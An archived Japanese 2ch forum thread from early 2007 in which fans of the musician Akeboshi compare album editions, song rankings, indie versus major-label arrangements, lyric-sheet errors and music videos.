309 :NO MUSIC NO NAME:2007/01/18(木) 20:15:06 ID:1F+Yt6sB
「Akeboshi」のデジパックと通常版との違いってなんですか?

310 :NO MUSIC NO NAME:2007/01/18(木) 20:20:42 ID:7Ub+cGok
>309
デジパックか通常仕様か

311 :NO MUSIC NO NAME:2007/01/18(木) 20:58:33 ID:k/4KyLmW
質問詰めで申し訳ありません。
>>310  ありがとうございます。
それでしたら4500円で買うのはどんなもんか…

自分はakeboshiを買い出して間もないのですが
(Faeris Punksまでしか持ってない)、自分の中のランキングは

1、Wind
2、廃墟のソファ
3、秋風のうた≧white reply>Tall boy

です。皆さんはどうですか?

312 :NO MUSIC NO NAME:2007/01/18(木) 21:04:50 ID:EkH+ckZ+
1 花火
2 イエロームーン
3 神様の舌打ち
4 ナインデイズワンダー
5 廃墟のソファ ワインド
6 他、同順

英語で書けなくてごめんなさい。

313 :NO MUSIC NO NAME:2007/01/19(金) 21:45:40 ID:KOTR4a+/
2chなくならないよね?

314 :NO MUSIC NO NAME:2007/01/20(土) 17:12:10 ID:yqNwD1TV
2chなくなったらここも無くなるんだなあ。

315 :NO MUSIC NO NAME:2007/01/20(土) 19:11:45 ID:COx9SgEe
なくなったら困るなあ。
まだまだみんなで明星についてマターリ語りたい。

316 :NO MUSIC NO NAME:2007/01/20(土) 23:38:29 ID:HGGnPwMu
>夜も更けた頃、思ったよりずっと柔らかな君の手を握り締めて

自分だけかもしれないけど、花火の↑のとこで、
歌詞の文章だと「頃」の後で切れるのが自然なのに、
メロディは「ずっと」の後でぶつ切れるのがすごく違和感ある…

317 :NO MUSIC NO NAME:2007/01/21(日) 18:01:40 ID:PoIo1jL+
???


318 :NO MUSIC NO NAME:2007/01/21(日) 20:47:53 ID:z7QZdQ16
明星はコンサートしないの?

319 :NO MUSIC NO NAME:2007/01/25(木) 20:12:05 ID:uX3YQUVU
幻想的な感じこの人の声
ナルト見てた頃1番好きなエンディングだったけどアルバム借りたら良すぎて全部MDに入れた。

てか初心者なのに来てスマソ・・

320 :NO MUSIC NO NAME:2007/01/26(金) 00:13:52 ID:Ag7zzTcK
Akeboshiさんの作る曲の世界観が大好きです。昨日「White reply」と「Faerie Punks」を購入したので届くのが楽しみ過ぎます…。早く聴きたいなぁ…。

321 :NO MUSIC NO NAME:2007/01/26(金) 02:21:27 ID:mESEw7I5
ナルトで聞いて惚れた。
なかなかワインド以外のCDが見つからなくて忘れてたけど買ったワインド今聴いて再熱した…


とりあえずイエロームーンと花火は聴いてみようと思いますが他におススメな曲はありますか?

322 :NO MUSIC NO NAME:2007/01/26(金) 11:49:49 ID:QpNHKkNx
廃墟のソファ、フルアルバムのバージョンでは
「ハープ弾きの老人の」の前後でハープが追加されてるよね。たぶん。
あ〜改良されてるなあって思った。
世界観と音をマッチさせてて。
違ってたらゴメンw

323 :NO MUSIC NO NAME:2007/01/26(金) 18:09:20 ID:Pxc/kd1F
自分もハープの音聞こえたような…

windはシングルの方が歌い方からすれば好きだけど、アルバムバージョンの
最初の方のバイオリンが好き♪



324 :NO MUSIC NO NAME:2007/01/26(金) 21:53:53 ID:p3BTjkau
私はフルアルバムのwindの方が好きかな。
どんどん声ののびが良くなってて、聴き心地がいい!

Yellow moon とかメジャーな曲も良いんだけど、聴けば聴くほど他の曲の良さがにじみ出てきて
年々中毒が酷くなってきてるw
花火、ホントに良い、たまらん。曲の情感が素晴らしすぎる。

早くライブしないかな。新曲も楽しみだけど、生が恋しくなってきたよ…

325 :NO MUSIC NO NAME:2007/01/27(土) 00:06:38 ID:tH8ViPwK
>>311
One step behind the door
tall boy
The Audience
神様の舌打ち
Sounds
順位なくここらへんが好き

326 :NO MUSIC NO NAME:2007/01/27(土) 14:56:45 ID:VLwpKq5q
>>321
アルバム聞いてみる

327 :NO MUSIC NO NAME:2007/01/27(土) 20:28:15 ID:sMdEA/F+
現在ヤフーオークションに明星の2曲入りカセットテープ
(非売品で、イベント時に配布していたもの)
が出てるんですけど…これってレアなんですか?(あと4時間なんですけど…)

どなたか持っている人いますか?

328 :NO MUSIC NO NAME:2007/01/27(土) 21:31:28 ID:ZWCxcs0K
>>327
レアです

2にはピアノインストゥルメンタルの「Forest and Fire」とFaerie Punksの雛形の「高い服を着たPUNKS(仮)」
3にはWindの雛形の「Five」とインストゥルメンタルの「Aggressive silence」
をそれぞれ収録してる

たしか1は廃墟のソファの雛形の「Green fish」(多分英語の歌詞)が収録されているらしいです

329 :NO MUSIC NO NAME:2007/01/27(土) 22:48:59 ID:sMdEA/F+
そうなんですか!ありがとうございます
値段も大変な事になってました(高

>>324
そうですか。
自分はやっぱり(シングルで)最初に聞いた方の影響が強いです

>>325
windは入らないんですか?

330 :NO MUSIC NO NAME:2007/01/28(日) 03:11:09 ID:qRCz19qT
届いた2枚のアルバムを今聴き終わりました。やっぱりAkeboshiさんの音楽は……言葉では上手く言い表わせないです。良かった。ますますAkeboshiさんの世界にハマった感じ。ライヴに行きたくなりました。

331 :NO MUSIC NO NAME:2007/01/28(日) 06:30:48 ID:V7ZEts1S
Perunaが何度聞いても飽きない!!!!

Writing over the signとか廃墟のソファもすごくいい!!


俺の中でのベスト3だよ

次点でDEEP ENDが好き!!

332 :NO MUSIC NO NAME:2007/01/28(日) 21:28:26 ID:+HiKnDkZ
YellowMoon 非売品フライヤー小冊子 って珍しいんですか?
詳細お願いします。

333 :NO MUSIC NO NAME:2007/01/30(火) 23:06:27 ID:NEZ42hUh
age

334 :NO MUSIC NO NAME:2007/01/31(水) 23:54:15 ID:nEXzf53v
死ぬ事の意味なんか考えたこともない

335 :NO MUSIC NO NAME:2007/02/01(木) 04:58:19 ID:6MxcJ1xM
オク厨いい加減に汁

336 :NO MUSIC NO NAME:2007/02/01(木) 08:18:08 ID:dcYSeChp
昨日ココ来れなくなったから閉鎖されたかと思った…
よかったぁ〜

337 :NO MUSIC NO NAME:2007/02/01(木) 08:31:30 ID:HNNsAAxL
自分以外に、明星好きな人がいてとても嬉しい。

みなさんはドコ住みですか?

338 :NO MUSIC NO NAME:2007/02/01(木) 14:22:29 ID:1/mkh7+W
自分は福岡住みです!!!
自分の周りにAkeboshiが好きな人がいないので語れる場所が無いんです…

339 :NO MUSIC NO NAME:2007/02/01(木) 18:34:54 ID:wFNLOsL/
自分は鳥取県に住んでいます!!
自分の学校のクラスの人の半分は曲は知らないけどAkeboshiのことは知っています!!


340 :NO MUSIC NO NAME:2007/02/01(木) 21:14:00 ID:iKgf4ajO
札幌。
akeboshiの毎週のラジオ番組が聞けてよかった。

341 :NO MUSIC NO NAME:2007/02/01(木) 21:27:40 ID:v6u6npaP
私は福井です。AkeboshiさんはNARUTOのエンディングを聴いてから知り、好きになりました。まだファンになりたてなので、こういうファン同士がAkeboshiさんを語れる所があって嬉しい。

342 :NO MUSIC NO NAME:2007/02/01(木) 23:28:39 ID:HNNsAAxL
九州、近畿、北海道…(福井は何地方かわかんないです)いろんな所に明星好きが居てもっと嬉しい。

自分は沖縄です。

343 :NO MUSIC NO NAME:2007/02/01(木) 23:28:45 ID:MyTcwh9i
何この流れ

344 :NO MUSIC NO NAME:2007/02/02(金) 00:25:44 ID:Xif/2mdv
2ch初心者が多そうなスレだなw

345 :NO MUSIC NO NAME:2007/02/02(金) 17:57:59 ID:thfcATpH
>>329
wind好きだよ
知って好きになった初めがそれだしね
ただあんま出てないお気に入りを晒しただけ

346 :NO MUSIC NO NAME:2007/02/03(土) 10:34:15 ID:giCKy70F
>>344 ド初診者です…

ナットク♪
最近は「高い服を着たパンクス」、にハマってます
ところで「廃墟ソファ」の英詩んとこが気になる…

347 :NO MUSIC NO NAME:2007/02/03(土) 11:56:43 ID:DFh0SDmd
>>342
北海道から沖縄までAkeboshiさん好きが居るんですね。ライヴに行ったことはありますか?最近ほんと生で聴きたくて…今年はライヴやるのかな?

あと、皆さんに質問なんですが、Akeboshiさんって日本人の方ですよね?ハーフって話が他の掲示板に書かれていたので……。

348 :NO MUSIC NO NAME:2007/02/03(土) 14:31:43 ID:dyK42Uuf
>>347
一度は生音を聞いてみたいのですが、ライブは行ったことないです。
ライブ経験ありですか?

349 :NO MUSIC NO NAME:2007/02/03(土) 20:06:17 ID:DFh0SDmd
>>348
私も行った事無いです…だから今年もしライヴやるとしたら、絶対行きます。Akeboshiさんの音楽は生で聴けたらきっと感動しますよね…。

350 :NO MUSIC NO NAME:2007/02/03(土) 20:37:24 ID:dyK42Uuf
>>349
すごい感動するでしょうね。鳥肌立ちそう

早く次のCDでないかな…

351 :NO MUSIC NO NAME:2007/02/03(土) 21:27:10 ID:vEHn3dpM
ファンサイト行きをお勧めしたい方がチラホラw

352 :NO MUSIC NO NAME:2007/02/03(土) 23:25:29 ID:8vVS5SQO
ファンサイト!?(ってツッコんでみる)

353 :NO MUSIC NO NAME:2007/02/04(日) 01:03:46 ID:FSJRYdzh
2ちゃん向きではない流れだな

354 :NO MUSIC NO NAME:2007/02/04(日) 02:35:02 ID:F8o7BmU6
例の新曲、ラジオでリクエストしたらかかるかな?
ミュージックスクエアでなくても。

355 :NO MUSIC NO NAME:2007/02/06(火) 01:27:35 ID:aYEj3Vun
久しぶりにHP行ってブログみてきたら
BRAHMANレコーディング参加してるとな
前にライブ一緒にやってた気がしたが(明星前座で)その繋がりなのかな
両方好きな俺にとってはとても期待高まるニュースだった

356 :NO MUSIC NO NAME:2007/02/06(火) 03:03:44 ID:IsHXLfrC
マーチン繋がりかと。<ブラフ

357 :NO MUSIC NO NAME:2007/02/06(火) 18:35:31 ID:8R3GoIWS
再放送のナルト見てたら無性にwind聞きたくなってきたんだけど
EDで使われてたwindはインディーズの頃の方のCDのwindなの?

ようつべでフル聞いてみたんだけど、どんくらーいの部分が違うと思って


358 :NO MUSIC NO NAME:2007/02/06(火) 19:04:23 ID:v28U07kx
そうだと思う
その頃はアルバムとか出してる時期じゃなかったし

359 :NO MUSIC NO NAME:2007/02/06(火) 19:09:56 ID:8R3GoIWS
>>358
やっぱりそうだったか
ありがとう、ED.verの方が好きだから
インディーズのCD探してみるよ

360 :NO MUSIC NO NAME:2007/02/06(火) 20:07:39 ID:v28U07kx
自分もインディーズから聴き始めたからこっちの方が好きだけど
何度も聴くうちに大分慣れた(演奏は別)

ってか最初に聴いたやつの影響が大分大きい気がする…

361 :NO MUSIC NO NAME:2007/02/07(水) 02:30:24 ID:yDzH4Qbr
数か月ぶりに、カキコします

あの日の代官山のライブ。ラストWINDで隣の小学生が飛び跳ねてたのが一番鳥肌たったよ

362 :NO MUSIC NO NAME:2007/02/07(水) 22:00:18 ID:F1tEoOut
小学生何!?
Windのカッカッカッのリズムが未だに打てない自分…(かなり聴いたのに

363 :NO MUSIC NO NAME:2007/02/08(木) 12:19:20 ID:V+c42vY2
明星好きな人いっぱい発見wてかスレあったんだ・・・
妙にうれしい

364 :NO MUSIC NO NAME:2007/02/09(金) 19:54:15 ID:PvggNr5W
こないだ出回ってた新曲の情報ってどうなったん?

365 :NO MUSIC NO NAME:2007/02/11(日) 14:20:08 ID:HFdrNSCy
Akeboshi好きなんだがたまに
「作詞・作曲だけに集中して歌い手探せばいいのに・・・」と
思うときがあったりする・・・

366 :NO MUSIC NO NAME:2007/02/11(日) 14:53:38 ID:0KAilUE3
そんな事ないですよぉ〜
確かに誰かがカバーしたのも聴いてみたい気がするけど…
やっぱり彼の歌声がスキ!

367 :NO MUSIC NO NAME:2007/02/11(日) 16:00:07 ID:EcLCjfCe
「花火」の歌詞カードの所の
 「遠く、遠くへ、ふたり歩いて行く」
って
 「遠く、遠くへと、ふたり歩いて行く」
だよね?
確実に既出だと思うが…

368 :NO MUSIC NO NAME:2007/02/12(月) 18:17:40 ID:n/BYgIut
明星の歌詞カードってよくミスがあるよな

369 :NO MUSIC NO NAME:2007/02/12(月) 19:51:11 ID:2tChL5h3
「花火」以外あったっけ?

370 :NO MUSIC NO NAME:2007/02/13(火) 00:22:30 ID:4sYNBFHf
へー!歌詞にミスとかあったんだ。知らなかった!

>>365
うちもそれ思う。楽曲提供とかしてほしい。
本人も自分の声嫌だって言ってたことだし・・・
ただ他にどんな声で歌ってもらうか想像がつかないんだがw

371 :NO MUSIC NO NAME:2007/02/13(火) 16:19:19 ID:v6eGJXgr
人に提供できるほど多作じゃないだろう

372 :NO MUSIC NO NAME:2007/02/13(火) 18:04:31 ID:HFrvFE5i
まわりまわって
明星本人の歌がいい、ってとこに戻りそう

373 :NO MUSIC NO NAME:2007/02/13(火) 21:00:27 ID:hm2gm2f2
確かに…
けど自分はやっぱ本人がいい(笑



374 :NO MUSIC NO NAME:2007/02/13(火) 23:39:05 ID:bHLUFfif
いい声してると思うけどなあ

375 :NO MUSIC NO NAME:2007/02/14(水) 01:38:20 ID:YY6YOt2V
声質は好き嫌いってことだな。

ところでメジャデビュCDでミニアルバムと違う編曲になってる曲がいくつかあったわけだが、
あの編曲がミニアルバムの方が好きだと思ってるのは自分だけかな?

376 :NO MUSIC NO NAME:2007/02/14(水) 16:25:35 ID:gh39b9CB
最初は変わりすぎ!とか思ったけど
ミニアルバムの方が声質大分良くなってるよな(歌い慣れてきた感じ

377 :NO MUSIC NO NAME:2007/02/15(木) 22:45:44 ID:+d/mwMG7
秋風のうたとか前の方がシンプルで好きだったな。
morning highも前の方が好きだった。

378 :NO MUSIC NO NAME:2007/02/16(金) 12:15:50 ID:YMMfIe2S
秋風のうたって歌い直しされてたっけ?

379 :NO MUSIC NO NAME:2007/02/16(金) 22:03:48 ID:wqNsAHSy
廃墟のソファじゃね?


最近White replyが気に入った
Akeboshiは実体験系の歌がカッコいいんじゃない?

380 :NO MUSIC NO NAME:2007/02/17(土) 10:17:39 ID:uw06aSbZ
秋風のうたは編曲が微妙に変わってる。
全体的に変な器械っぽいエコーみたいなのが入ってて音がぼやけてるんだよなぁ。
あれがちょっと耳障り。
サビらへんの休符の切れも好きだったのになぁ。


なるほど!確かに実体験の曲いいね!
Akeboshiってしょっちゅう世界を旅してるイメージだ。
なんかちょっとジャーナリストみたいだ。

381 :NO MUSIC NO NAME:2007/02/17(土) 19:53:59 ID:iPN5XXOZ
秋風のうたってAkeboshiでは編曲されてたんだ
知らなかった。

実体験系で名曲って言ったら廃墟のソファだと思うけど
他にもWhite reply、A Nine Days' Wonder、Soundsがあるよね
A Nine Days' Wonderは実体験かちょっと微妙だけど

382 :NO MUSIC NO NAME:2007/02/17(土) 22:55:09 ID:IXXKB+y0
One step behind the door って実体験の歌じゃなかったけ
音楽雑誌のインタビューで読んだような気が

383 :NO MUSIC NO NAME:2007/02/18(日) 07:50:58 ID:NIUrOFXs
>382
ああ、そうだった
ごめん

384 :NO MUSIC NO NAME:2007/02/18(日) 09:10:34 ID:KdKNO40f
実体験の歌の中でも、花火は説明が丁寧すぎて
日記みたいで少し稚拙な気がする。
A Nine Days' Wonderくらい婉曲的なほうが面白いかな。

385 :NO MUSIC NO NAME:2007/02/18(日) 13:16:59 ID:sURA2GsY
花火の実体験ってどんなだったんだ…?

386 :NO MUSIC NO NAME:2007/02/18(日) 14:15:36 ID:OzZwlx1Z
花火も実体験なの?
あれは想像して書いたんだとなんとなく思ってた
明星の小さい頃に虐待を受けてた友達がいたってことか。

387 :NO MUSIC NO NAME:2007/02/18(日) 17:38:11 ID:WHg7sv4F
ageちゃいますよ

388 :NO MUSIC NO NAME:2007/02/18(日) 19:47:28 ID:/fk05k1d
やっぱCD買ってるだけじゃわからない事も多いですな、Akeboshiは(自分が

389 :NO MUSIC NO NAME:2007/02/19(月) 21:45:55 ID:3lcfTb0S
age

390 :NO MUSIC NO NAME:2007/02/19(月) 22:00:57 ID:gQcgn1mC
つべにwindのPVあがっててびびった。あったんだね。
しかもメジャーverのやつ。逆立ちすごいwww

391 :NO MUSIC NO NAME:2007/02/19(月) 22:19:46 ID:0K03K/wy
むしろインディーズver.の方が見たい

392 :NO MUSIC NO NAME:2007/02/20(火) 17:13:49 ID:JmGo6WHg
逆立ちはすごいが、直立してるときのスタイルが…

393 :NO MUSIC NO NAME:2007/02/20(火) 22:28:42 ID:ZMrSmVnM
インディーズのやつ見たことない!
誰か見たことある人いる!?

394 :NO MUSIC NO NAME:2007/02/21(水) 20:22:22 ID:A7blnIDJ
見たことあるような…
Yellow Moon のPVの最後のakebohi(の寝顔)はカッコ良いと思った!

395 :NO MUSIC NO NAME:2007/02/22(木) 18:19:50 ID:XbVsXtMY
むしろかわゆす

396 :NO MUSIC NO NAME:2007/02/22(木) 18:24:42 ID:pD8lTJk5
スペシャで検索したらTall boyと秋風のうたにもPVあんのね、見たいなー。

397 :NO MUSIC NO NAME:2007/02/22(木) 18:25:52 ID:+8LsOfW6
アケボシを動物たとえると、やっぱりCDジャケなどの絵から猫なのだろうか
でもフクロウもあったよね。自分的にはフクロウかなー。もっさり感。笑

398 :NO MUSIC NO NAME:2007/02/22(木) 22:56:50 ID:Xf/rA4Yn
ピアノを弾くって事考えたら
 Akebosi⇒ネコ
もっさり間的には
 Akebosi⇒フクロウ




75 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)